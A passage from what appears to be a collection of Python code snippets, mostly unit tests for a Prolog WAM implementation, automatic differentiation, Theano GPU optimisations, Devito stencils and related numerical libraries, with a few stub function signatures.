wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def intersection(x, y, f, p):", "def test_pow_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = x**3 + y**3\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), 0.0)\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2), 9.0)\n assert equals(f.derivative_at((y, y), {x: 1.5, y:2.5}, order=2), 15.0)\n f = (x-y)**3\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n -6.0*(1.5-2.5))", "def test_ex_2_3(self):\n\n wam = WAM()\n wam.execute(self.fig_2_3_instrs)\n aW = wam.deref_reg(5)\n aZ = wam.deref_reg(2)\n wam.execute(self.fig_2_4_instrs)\n aX = wam.deref_reg(5)\n aY = wam.deref_reg(4)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def structured_pow(x, y):\r\n # see decorator for function body\r", "def test_get_functions(sersic_2d_image,segm_and_cat):\n cat, segm, segm_deblend = segm_and_cat\n\n base_source = cat[0]\n\n source = base_source\n\n assert pf.get_source_position(source) == (base_source.maxval_xindex, base_source.maxval_yindex)\n assert pf.get_source_elong(source) == base_source.elongation.value\n assert pf.get_source_ellip(source) == base_source.ellipticity.value\n assert pf.get_source_theta(source) == base_source.orientation.to('rad').value\n\n x0, y0 = pf.get_source_position(source)\n ellip, theta = pf.get_source_ellip(source), pf.get_source_theta(source)\n\n assert np.round(pf.get_amplitude_at_r(200, sersic_2d_image, x0, y0 , ellip, theta), 6) == 0.036798", "def bitwise_stats(traces, N, delta):\n \n X = np.zeros((N,),dtype=int)\n padded_traces = pad_traces(traces, N)\n num_traces = padded_traces.shape[0]\n \n p = np.zeros(N)\n for j in range(N):\n p[j] = np.sum(padded_traces[:,j])/num_traces\n \n c = np.concatenate((np.ones(N,), np.zeros(N,)), axis=None)\n bounds = (0,1)\n \n for i in range(N):\n A_ub = np.zeros((2*N,2*N))\n for j in range(N):\n for k in range(N):\n if j == k:\n A_ub[j,k] = -1\n A_ub[j+N,k] = -1\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n elif k > j:\n A_ub[j,k+N] = alpha(j+1,k+1,delta)\n A_ub[j+N,k+N] = -1*A_ub[j,k+N]\n \n b_ub = np.concatenate((p,-1*p), axis=None)\n \n A_eq0 = np.zeros((i+1,2*N))\n b_eq0 = np.zeros(i+1)\n for j in range(i+1):\n A_eq0[j,j+N] = 1\n if j==i:\n b_eq0[j] = 0\n else:\n b_eq0[j] = X[j]\n \n A_eq1 = np.zeros((i+1,2*N))\n b_eq1 = np.zeros(i+1)\n for j in range(i+1):\n A_eq1[j,j+N] = 1\n if j==i:\n b_eq1[j] = 1\n else:\n b_eq1[j] = X[j]\n \n res0 = linprog(c,A_ub,b_ub,A_eq0,b_eq0,bounds,method='interior-point')\n res1 = linprog(c,A_ub,b_ub,A_eq1,b_eq1,bounds,method='interior-point')\n if res0.fun < res1.fun:\n X[i] = 0\n else:\n X[i] = 1\n \n return X", "def intersect(f, df, g, dg):\n \"*** YOUR CODE HERE ***\"", "def pyelemfunctions():\n for elemid in unique(top.idpyelem[:top.nppyelem]):\n ip = (top.idpyelem[:top.nppyelem] == elemid)\n x = top.xpyelem[:top.nppyelem][ip]\n y = top.ypyelem[:top.nppyelem][ip]\n z = top.zpyelem[:top.nppyelem][ip]\n # --- The conversion to int is needed since a numpy.int64 is different than an int.\n (ex,ey,ez,bx,by,bz) = pyelemfunctionsdict[int(elemid)](x,y,z)\n top.expyelem[:top.nppyelem][ip] = ex\n top.eypyelem[:top.nppyelem][ip] = ey\n top.ezpyelem[:top.nppyelem][ip] = ez\n top.bxpyelem[:top.nppyelem][ip] = bx\n top.bypyelem[:top.nppyelem][ip] = by\n top.bzpyelem[:top.nppyelem][ip] = bz", "def loc_eval(x, b):\r\n loc_est = 0\r\n for i in enumerate(b): loc_est+=i[1]*(x**i[0])\r\n return(loc_est)", "def test_elemwise2():\r\n rng = numpy.random.RandomState(int(time.time()))\r\n shape = (3, 5)\r\n for pattern in [(0, 1), (1, 0)]:\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), name=None)\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle(pattern))],\r\n mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32') * .3)\r\n\r\n shape = (3, 4, 5, 6)\r\n a = tcn.shared_constructor(theano._asarray(rng.rand(*shape),\r\n dtype='float32'), 'a')\r\n b = tensor.Tensor(dtype='float32', broadcastable=[0] * len(shape))()\r\n f = pfunc([b], [], updates=[(a, (a + b).dimshuffle([2, 0, 3, 1]) *\r\n tensor.exp(b ** a).dimshuffle([2, 0, 3, 1]))], mode=mode_with_gpu)\r\n has_elemwise = False\r\n for i, node in enumerate(f.maker.fgraph.toposort()):\r\n has_elemwise = has_elemwise or isinstance(node.op, tensor.Elemwise)\r\n assert not has_elemwise\r\n #let debugmode catch errors\r\n f(theano._asarray(rng.rand(*shape), dtype='float32'))", "def test_advanced_manipulations(free_alg):\n dr = free_alg\n p = dr.names\n i, j, k = p.i, p.j, p.k\n\n u = IndexedBase('u')\n v = IndexedBase('v')\n f = Vec('f')\n\n tensor = dr.einst(u[i, j] * f[j] + v[i, j] * f[j])\n assert tensor.n_terms == 2\n\n def has_u(term):\n \"\"\"Test if a term have u tensor.\"\"\"\n return term.amp.has(u)\n\n expect = dr.sum((j, p.R), u[i, j] * f[j])\n for res in [\n tensor.filter(has_u),\n tensor.bind(lambda x: [x] if has_u(x) else [])\n ]:\n assert res.n_terms == 1\n assert res == expect\n\n def subst_i(term):\n \"\"\"Substitute i index in the terms.\"\"\"\n return Term(term.sums, term.amp.xreplace({i: k}), term.vecs)\n\n expect = dr.sum((j, p.R), u[k, j] * f[j] + v[k, j] * f[j])\n for res in [\n tensor.map(subst_i),\n tensor.bind(lambda x: [subst_i(x)]),\n tensor.map2scalars(lambda x: x.xreplace({i: k}))\n ]:\n assert res.n_terms == 2\n assert res == expect\n\n alpha, beta = symbols('alpha beta')\n assert tensor.bind(\n lambda x: [Term(x.sums, x.amp * i_, x.vecs) for i_ in [alpha, beta]]\n ) == (tensor * alpha + tensor * beta)\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k})\n ) == dr.sum((j, p.R), u[i, k] * f[k] + v[i, k] * f[k])\n\n assert tensor.map2scalars(\n lambda x: x.xreplace({j: k}), skip_vecs=True\n ) == dr.sum((j, p.R), u[i, k] * f[j] + v[i, k] * f[j])", "def test_AND():\n\tk, outputs = 2, [0,0,0,1]\n\t# Prime Implicants\n\ttrue_pi0s = set(['02','20'])\n\ttrue_pi1s = set(['11'])\n\n\ttdt0, tdt1 = make_transition_density_tables(k=k, outputs=outputs)\n\tpi0s, pi1s = find_implicants_qm(tdt0) , find_implicants_qm(tdt1)\n\n\tassert (pi0s == true_pi0s) , ('Prime Implicants for 0 does not match. %s != %s' % (pi0s,true_pi0s))\n\tassert (pi1s == true_pi1s) , ('Prime Implicants for 1 does not match. %s != %s' % (pi1s,true_pi1s))\n\t# Two Symbols\n\ttrue_ts0s = [('02',[[0,1]],[])]\n\ttrue_ts1s = [('11',[],[[0,1]])]\n\n\tts0s,ts1s = find_two_symbols_v2(k=k, prime_implicants=pi0s) , find_two_symbols_v2(k=k, prime_implicants=pi1s)\n\n\tassert (ts0s == true_ts0s) , ('Two Symbol for 0 does not match. %s != %s' % (ts0s,true_ts0s))\n\tassert (ts1s == true_ts1s) , ('Two Symbol for 1 does not match. %s != %s' % (ts1s,true_ts1s))", "def test_expression(x, y, z):\n return x * y + y / z", "def test_ex_2_7(self):\n\n wam = WAM()\n wam.execute(self.fig_2_9_instrs[:-1]) # last instruction is call; remove it\n wam.execute(self.fig_2_10_instrs)\n aW = wam.deref_reg(4)\n aX = wam.deref_reg(4)\n aY = wam.deref_reg(5)\n aZ = wam.deref_reg(1)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_binops(self):", "def test_grad_binary_int(func, motion, optimized, preserve_result, a, n):\n utils.test_reverse_array(func, motion, optimized, preserve_result, a, n)", "def test_indexed_increment(self, expr, result):\n j, l = dimify('j l')\n a = symbol(name='a', dimensions=(j, l), value=2., mode='indexed').base\n fa = a.function\n fa.data[1:, 1:] = 0\n\n eqn = eval(expr)\n Operator(eqn)(fa)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_ex_2_9(self):\n\n compiler = Compiler()\n\n X = Variable()\n Y = Variable()\n query = Compound('p', Compound('f', X), Compound('h', Y, Compound('f', Atom('a'))), Y)\n query_reg_allocation = RegisterAllocation()\n query_instrs = compiler.compile_query_m1(query, query_reg_allocation)\n\n W = Variable()\n Z = Variable()\n program = Compound('p', Z, Compound('h', Z, W), Compound('f', W))\n # Because there is a shared register space, we reuse the query's register allocation to\n # force the program's registers into different slots.\n program_reg_allocation = query_reg_allocation # RegisterAllocation()\n program_instrs = compiler.compile_program_m1(program, program_reg_allocation)\n program_instrs = program_instrs[:-1] # last instruction is proceed; remove it\n\n wam = WAM()\n wam.load(None, query_instrs)\n wam.load(program.get_functor(), program_instrs)\n wam.run()\n\n aW = wam.deref_reg(program_reg_allocation[W])\n aX = wam.deref_reg(query_reg_allocation[X])\n aY = wam.deref_reg(query_reg_allocation[Y])\n aZ = wam.deref_reg(program_reg_allocation[Z])\n\n #print 'X reg:', query_reg_allocation.reg_allocation[X], 'X addr:', aX, 'X: ', wam.get_term_repr(aX)\n #print 'Y reg:', query_reg_allocation.reg_allocation[Y], 'Y addr:', aY, 'Y: ', wam.get_term_repr(aY)\n #print 'Z reg:', program_reg_allocation.reg_allocation[Z], 'Z addr:', aZ, 'Z: ', wam.get_term_repr(aZ)\n #print 'W reg:', program_reg_allocation.reg_allocation[W], 'W addr:', aW, 'W: ', wam.get_term_repr(aW)\n self.assertEqual(wam.get_term_repr(aW), 'f(a)')\n self.assertEqual(wam.get_term_repr(aX), 'f(a)')\n self.assertEqual(wam.get_term_repr(aY), 'f(f(a))')\n self.assertEqual(wam.get_term_repr(aZ), 'f(f(a))')", "def test_vec_func2():\n\n c = [1,2]\n p = [1,1]\n def myfunc(x,y):\n a = EF.exp_base(2,x) #base 2 and exponent x\n b = EF.logistic(y)\n c = EF.log(y,2) #log with base 2\n return a + b + c\n\n f_obj=ADiff(myfunc)\n res=f_obj.pJac(c,p)\n\n expectAns={'diff': math.pow(2,c[0])+1/(1 + math.exp(-c[1]))*(1-(1/(1 + math.exp(-c[1]))))+1/((c[1])*math.log(2)), 'value': math.pow(2,c[0])+(1 / (1 + math.exp(-c[1])))+math.log(c[1],2)}\n\n assert res==expectAns", "def test_elemwise_multiple_inputs_optimisation2(self):\r\n raise SkipTest(\"Current implementation of Canonizer does not \"\r\n \"implement all cases. Skip the corresponding test.\")\r\n\r\n shp = (5, 5)\r\n fx, fy, fz = fmatrices('xyz')\r\n dx, dy, dz = dmatrices('xyz')\r\n fv = fvector('r').dimshuffle('x', 0)\r\n dv = dvector('s').dimshuffle('x', 0)\r\n fxv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fyv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fzv = theano._asarray(numpy.random.rand(*shp), dtype='float32')\r\n fvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float32').reshape(1, shp[0])\r\n dxv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dyv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dzv = theano._asarray(numpy.random.rand(*shp), dtype='float64')\r\n dvv = theano._asarray(numpy.random.rand(shp[0]), dtype='float64').reshape(1, shp[0])\r\n cases = [\r\n (fx + fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx * fy, (fx, fy), (fxv, fyv), 1, 'float32'),\r\n (fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx + dy + dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (dx * dy * dz, (dx, dy, dz), (dxv, dyv, dzv), 1, 'float64'),\r\n (fx * fy * (fx + fy + fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (dx * dy * (dx + dy + dz), (dx, dy, dz), (dxv, dyv,\r\n dzv), 2, 'float64'),\r\n (fx * fy * (fx + fy + dz), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type add\r\n (dz * fy * (fx + fy), (fx, fy, dz), (dxv, dyv, dzv), 2,\r\n 'float64'), # check mixed type mul\r\n #check with dimshuffle of constant\r\n (fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 * fx * fy * fz, (fx, fy, fz), (fxv, fyv, fzv), 1, 'float32'),\r\n (2 + fx + fy + fz + 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (2 * fx * fy * fz * 2, (fx, fy, fz), (fxv, fyv,\r\n fzv), 1, 'float32'),\r\n (fx * fy * 2 * (fx+fy+fz), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n (fx*fy*(2+fx+fy+fz), (fx, fy, fz), (fxv, fyv, fzv), 2, 'float32'),\r\n (fx*fy*2*(fx+fy+fz+2), (fx, fy, fz), (fxv, fyv,\r\n fzv), 2, 'float32'),\r\n\r\n #check with broadcast of row\r\n (fx+fy+fz+fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fz*fv, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv+fx+fy+fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fv*fx*fy*fz, (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 1, 'float32'),\r\n (fx*fy*fv*(fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv,\r\n fzv, fvv), 2, 'float32'),\r\n (fx*fy*fv*(fv+fx+fy+fz), (fx, fy, fz, fv), (fxv, fyv, fzv,\r\n fvv), 2, 'float32'),\r\n (dx+dy+dz+dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dz*dv, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv+dx+dy+dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dv*dx*dy*dz, (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 1, 'float64'),\r\n (dx*dy*dv*(dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv,\r\n dzv, dvv), 2, 'float64'),\r\n (dx*dy*dv*(dv+dx+dy+dz), (dx, dy, dz, dv), (dxv, dyv, dzv,\r\n dvv), 2, 'float64'),\r\n\r\n ] # [10:11]\r\n# print cases\r\n\r\n #We must be sure that the Canonizer is working, but that we don't have other\r\n # optimisation that could hide bug in the Canonizer as local_elemwise_fusion\r\n mode = compile.mode.get_default_mode()\r\n mode._optimizer = gof.Query([\"canonicalize\"])\r\n mode._optimizer = mode._optimizer.excluding('local_elemwise_fusion')\r\n for id, [g, sym_inputs, val_inputs, nb_elemwise, out_dtype] in enumerate(cases):\r\n f = compile.function(list(sym_inputs), g,\r\n #we need the optimisation enabled, debug do this.\r\n mode=mode)\r\n\r\n out = f(*val_inputs)\r\n assert(len(f.maker.fgraph.toposort()) == nb_elemwise)\r\n assert(out_dtype == out.dtype)", "def test_sum_pos_3() -> None:\n # 2nd step - 3rd square\n assert nth(sw.sum_walk(), 1) == 2", "def test_generate_condition_function():\n masks = 4 # Always > 2\n vals = 15\n np_masks = np.random.randint(2, size=(masks, vals), dtype=bool)\n tf_masks = [tf.constant(i, dtype=tf.bool) for i in np_masks]\n # Generate the functions for and and or\n f_and = generate_condition_function(masks, \"and\")\n f_or = generate_condition_function(masks, \"or\")\n # Get the numpy and tf results\n np_ands = np.all(np_masks, axis=0)\n np_ors = np.any(np_masks, axis=0)\n tf_ands, idx_ands = f_and(*tf_masks)\n tf_ors, idx_ors = f_or(*tf_masks)\n # Check the values are the same\n util_check(np_ands, tf_ands, idx_ands)\n util_check(np_ors, tf_ors, idx_ors)\n # Check a combination\n f_comb = generate_condition_function(3, [\"and\", \"or\"])\n np_comb = np_masks[0] & np_masks[1] | np_masks[2]\n tf_comb, idx_comb = f_comb(*tf_masks[:3])\n util_check(np_comb, tf_comb, idx_comb)\n # Check failures\n with pytest.raises(ValueError):\n generate_condition_function(1, \"and\")\n with pytest.raises(ValueError):\n generate_condition_function(5, \"bad_condition\")\n with pytest.raises(ValueError):\n generate_condition_function(5, [\"or\", \"and\"])\n with pytest.raises(ValueError):\n generate_condition_function(3, [\"or\", \"bad_condition\"])", "def test_stencil_derivative(grid, shape, SymbolType, dim):\n i = dim(grid) # issue fixtures+parametrize: github.com/pytest-dev/pytest/issues/349\n u = SymbolType(name='u', grid=grid)\n u.data[:] = 66.6\n di = u.diff(i)\n dii = u.diff(i, i)\n # Check for sympy Derivative objects\n assert(isinstance(di, Derivative) and isinstance(dii, Derivative))\n s_di = di.as_finite_difference([i - i.spacing, i])\n s_dii = dii.as_finite_difference([i - i.spacing, i, i + i.spacing])\n # Check stencil length of first and second derivatives\n assert(len(s_di.args) == 2 and len(s_dii.args) == 3)\n u_di = s_di.args[0].args[1]\n u_dii = s_di.args[0].args[1]\n # Ensure that devito meta-data survived symbolic transformation\n assert(u_di.grid.shape == shape and u_dii.grid.shape == shape)\n assert(u_di.shape == u.shape and u_dii.shape == u.shape)\n assert(np.allclose(u_di.data, 66.6))\n assert(np.allclose(u_dii.data, 66.6))", "def test_amp_sums_can_be_simplified(free_alg):\n dr = free_alg\n v = dr.names.v\n n, i, j = symbols('n i j')\n x = IndexedBase('x')\n r = Range('D', 0, n)\n\n tensor = dr.sum((i, r), (j, r), i ** 2 * x[j] * v[j])\n res = tensor.simplify_sums()\n assert res == dr.sum((j, r), (\n n ** 3 / 3 - n ** 2 / 2 + n / 6\n ) * x[j] * v[j])", "def ED(X,Y):", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_pow_2ndord():\n # one variable\n x = fwd.Variable()\n f = (x+1)**3\n assert equals(f.derivative_at(x, {x: 2.0}, order=2), 18.0)\n # two variables\n x, y = fwd.Variable(), fwd.Variable()\n g = (x+y)**3\n assert equals(g.derivative_at(x, {x: 2.0, y: 1.0}, order=2), 18.0)\n # test error raising\n with pytest.raises(NotImplementedError):\n g.derivative_at(x, {x:1.0, y: 2.0}, order=3)", "def test_2d_2d(self):\n \n self.assertEqual(len(self.storage), 0)\n \n @interpolated(self.storage, max_distance=0.75)\n def func(point):\n x, y = point\n return [x**2, y]\n \n a = func((1, 1))\n self.assertEqual(len(self.storage), 1)\n self.assertEqual(a, [1**2, 1])\n \n a = func((2, 1))\n self.assertEqual(len(self.storage), 2)\n self.assertEqual(a, [2**2, 1])\n \n a = func((1, 2))\n self.assertEqual(len(self.storage), 3)\n self.assertEqual(a, [1**2, 2])\n \n a = func((2, 2))\n self.assertEqual(len(self.storage), 4)\n self.assertEqual(a, [2**2, 2])\n \n a = func((1.5, 1.5))\n self.assertEqual(len(self.storage), 4)\n self.assertAlmostEqual(a[0], 0.5*(1**2 + 2**2))\n self.assertAlmostEqual(a[1], 1.5)", "def past_weight_grad_calculator2(xs, es, kp_x, kd_x, kp_e, kd_e, shapes):\n kp_x, kd_x, kp_e, kd_e = [as_floatx(k) for k in (kp_x, kd_x, kp_e, kd_e)]\n n_samples, n_in, n_out = shapes\n rx = kd_x/(kp_x+kd_x)\n re = kd_e/(kp_e+kd_e)\n\n xr = create_shared_variable(np.zeros((n_samples, n_in)))\n er = create_shared_variable(np.zeros((n_samples, n_out)))\n\n\n\n\n # xr_new = xr*rx + xs/(kp_x+kd_x)\n # er_new = er*re + es/(kp_e+kd_e)\n\n arr = rx*re/(1-rx*re)\n\n xr_new = xr*arr + xs/(kp_x+kd_x)\n er_new = er*arr + es/(kp_e+kd_e)\n\n xsum = create_shared_variable(np.zeros((n_samples, n_in)))\n esum = create_shared_variable(np.zeros((n_samples, n_out)))\n\n xsum_new = xsum+xr_new\n esum_new = esum+er_new\n\n x_nospikes = tt.eq(xs, 0)\n e_nospikes = tt.eq(es, 0)\n\n dw = xs.T.dot(esum_new) + xsum_new.T.dot(es)\n\n add_update(xr, xr_new)\n add_update(er, er_new)\n add_update(xsum, xsum_new*x_nospikes)\n add_update(esum, esum_new*e_nospikes)\n\n return xs.T.dot(er) + xr.T.dot(es)\n # return xr.T.dot(er)\n # return dw", "def _evaluable_view(self, stencil, arr, offset=0):\n if self.dim == 1:\n if isinstance(stencil, Stencil):\n\n l = self.borders[0]-stencil.b[0][0]\n r = -(self.borders[1]-stencil.b[0][1])\n else:\n l = self.borders[0]-stencil[0][0]\n r = -(self.borders[1]-stencil[0][1])\n return arr[l+offset: r+offset]\n else:\n raise NotImplementedError(\"Another dimension than one \"\n \"is not supplied\")", "def _test_parse_function(self, idx):\n left_image = self.left_images[idx]\n right_image = self.right_images[idx]\n\n paddings = self.get_paddings()\n left_image = tf.pad(tf.expand_dims(left_image, 0), paddings, \"CONSTANT\")\n right_image = tf.pad(tf.expand_dims(right_image, 0), paddings, \"CONSTANT\")\n\n return left_image, right_image", "def test_elemwise_composite_support_code():\r\n X = tcn.shared_constructor(value=numpy.zeros((100, 10), dtype=\"float32\"),\r\n name='X')\r\n W = tcn.shared_constructor(value=numpy.zeros((10, 1), dtype=\"float32\"),\r\n name='W')\r\n U = T.dot(X, W)\r\n Y = tcn.shared_constructor(value=numpy.zeros((100, 1), dtype=\"float32\"),\r\n name='Y')\r\n P = T.exp(-(Y - U) ** 2)\r\n epsilon = numpy.asarray(0.001, dtype=\"float32\")\r\n NLL = -T.mean(T.log(P + epsilon)) # SupportCodeError\r\n G = theano.gradient.grad(NLL, wrt=[W])\r\n\r\n backup = theano.config.warn.identify_1pexp_bug\r\n theano.config.warn.identify_1pexp_bug = False\r\n try:\r\n f_grad = theano.function(inputs=[], outputs=G, mode=mode_with_gpu)\r\n finally:\r\n theano.config.warn.identify_1pexp_bug = backup\r\n f_grad()\r\n\r\n topo = f_grad.maker.fgraph.toposort()\r\n assert sum([isinstance(node.op, T.Elemwise) for node in topo]) == 1\r\n #I suspect this was failing in the original branch too\r\n assert sum([isinstance(node.op, tcn.GpuElemwise) for node in topo]) == 1", "def local_func(f, t, x, w):\n x_func = np.zeros_like(t, dtype='f')\n for i, jd in enumerate(t.jd):\n sel = (t.jd >= (jd - w)) & (t.jd <= (jd + w))\n x_func[i] = f(x[sel])\n return x_func", "def test_y_before_x(self):", "def test_mod():\r\n x, y = fscalars('xy')\r\n fn = gof.DualLinker().accept(\r\n gof.FunctionGraph([x, y], [x % y])).make_function()\r\n for a, b in ((0, 1), (1, 1), (0, -1), (1, -1), (-1, -1),\r\n (1, 2), (-1, 2), (1, -2), (-1, -2),\r\n (5, 3), (-5, 3), (5, -3), (-5, -3)\r\n ):\r\n assert fn(a, b) == a % b, (a,)", "def test_exp_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.exp(x/y)\n df_dxdy = lambda x, y: -(x*np.exp(x/y) + y*np.exp(x/y)) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def test_deep(self, expr, result, mode):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2., mode=mode)\n b = symbol(name='b', dimensions=(j, k), value=3., mode=mode)\n fa = a.base.function if mode == 'indexed' else a\n fb = b.base.function if mode == 'indexed' else b\n\n eqn = eval(expr)\n Operator(eqn)(fa, fb)\n assert np.allclose(fa.data, result, rtol=1e-12)", "def test_nofission_as_illegal():\n grid = Grid(shape=(20, 20))\n x, y = grid.dimensions\n\n f = Function(name='f', grid=grid, dimensions=(y,), shape=(20,))\n u = TimeFunction(name='u', grid=grid)\n v = TimeFunction(name='v', grid=grid)\n\n eqns = [Inc(f, v + 1.),\n Eq(u.forward, f[y + 1] + 1.)]\n\n op = Operator(eqns, opt='fission')\n\n assert_structure(op, ['t,x,y', 't,x,y'], 't,x,y,y')", "def user_function(x, y):\r\n return x ** 2 + 2 * y ** 2", "def are_these_two_locations_visible_to_each_other(first_x, first_y, second_x, second_y, can_see_past_function):\n are_visible = True\n if first_x == second_x:\n direction = utilities.sign(second_y - first_y)\n for i in range(first_y + direction, second_y, direction):\n if not can_see_past_function(first_x, i):\n are_visible = False\n break\n elif first_y == second_y:\n direction = utilities.sign(second_x - first_x)\n for i in range(first_x + direction, second_x, direction):\n if not can_see_past_function(i, first_y):\n are_visible = False\n break\n else:\n are_visible = False\n return are_visible", "def test_local_sigm_times_exp(self):\r\n def match(func, ops):\r\n #print [node.op.scalar_op for node in func.maker.fgraph.toposort()]\r\n assert [node.op for node in func.maker.fgraph.toposort()] == ops\r\n m = self.get_mode(excluding=['local_elemwise_fusion', 'inplace'])\r\n x, y = tensor.vectors('x', 'y')\r\n\r\n f = theano.function([x], sigmoid(-x) * tensor.exp(x), mode=m)\r\n match(f, [sigmoid])\r\n\r\n f = theano.function([x], sigmoid(x) * tensor.exp(-x), mode=m)\r\n match(f, [tensor.neg, sigmoid])\r\n\r\n f = theano.function([x], -(-(-(sigmoid(x)))) * tensor.exp(-x), mode=m)\r\n match(f, [tensor.neg, sigmoid, tensor.neg])\r\n\r\n f = theano.function(\r\n [x, y],\r\n (sigmoid(x) * sigmoid(-y) * -tensor.exp(-x) *\r\n tensor.exp(x * y) * tensor.exp(y)),\r\n mode=m)\r\n match(f, [sigmoid, tensor.mul, tensor.neg, tensor.exp, sigmoid,\r\n tensor.mul])", "def test_gradable_funcs(self):\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_grad_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_grad_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([0.2, 0.4, 0.6, 0.8]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 